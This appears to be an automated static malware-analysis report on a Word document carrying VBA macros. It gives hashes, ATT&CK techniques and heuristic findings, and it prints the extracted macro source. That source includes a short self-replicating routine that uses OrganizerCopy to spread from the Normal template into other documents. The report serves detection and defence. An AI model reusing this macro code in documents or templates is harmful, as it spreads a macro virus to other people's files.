Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 34bca651a6258384…

MALICIOUS

Office (OLE) / .DOC

135.0 KB Created: 2019-12-10 17:31:00 Authoring application: Microsoft Office Word First seen: 2020-08-10
MD5: ca3b521f3404c6163d3547e7b493a60c SHA-1: 47ccaf2aa934d286ba6d586428124bb6cde3ff26 SHA-256: 34bca651a6258384b3e044024307e8e1e2b1d97739154c90bb8634ce8a149fd2
82 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a Microsoft Word document containing VBA macros. A critical heuristic indicates that the VBA macro attempts self-replication, potentially spreading to other documents. The macro code includes logic for copying itself to the target document's project items, suggesting an attempt to ensure persistence or spread. No external network activity or specific payload delivery was detected from the static analysis.

Heuristics 3

  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
        Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=Target.FullName, Name:="Code", Object:=wdOrganizerObjectProjectItems
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.google.it/imgres?imgurl=http://www.292.it/stemma-repubblica-italiana/img/stemma_repubblica_italiana_colori.jpg&imgrefurl=http://www.292.it/stemma-repubblica-italiana/stemma-repubblica-italiana.html&h=233&w=203&sz=25&tbnid=z4E5uuDenmSJgM:&tbnh=109&tbnw=95&prev=/images%3Fq%3Dstemma%2Bdella%2Brepubblica%2Bitaliana&hl=it&usg=__9WfVsfiRpH0zseuVyQS4-STi5BE=&ei=mGJQStXBKZegngPZo8W7DA&sa=X&oi=image_result&resnum=3&ct=image In document text (OLE body)
    • http://www.google.it/images?q=tbn:z4E5uuDenmSJgM::www.292.it/stemma-repubblica-italiana/img/stemma_repubblica_italiana_colori.jpgIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1379 bytes
SHA-256: cd057fad92d9bddd02b3a548341eb30f3bfea0b3a29fc4d2e113b557055533b7
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
































































































































































































































































































































































































































Attribute VB_Name = "Code"
Sub CopyVirCodeToDocument(Target As Document)
    On Local Error Resume Next
    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=Target.FullName, Name:="Code", Object:=wdOrganizerObjectProjectItems
End Sub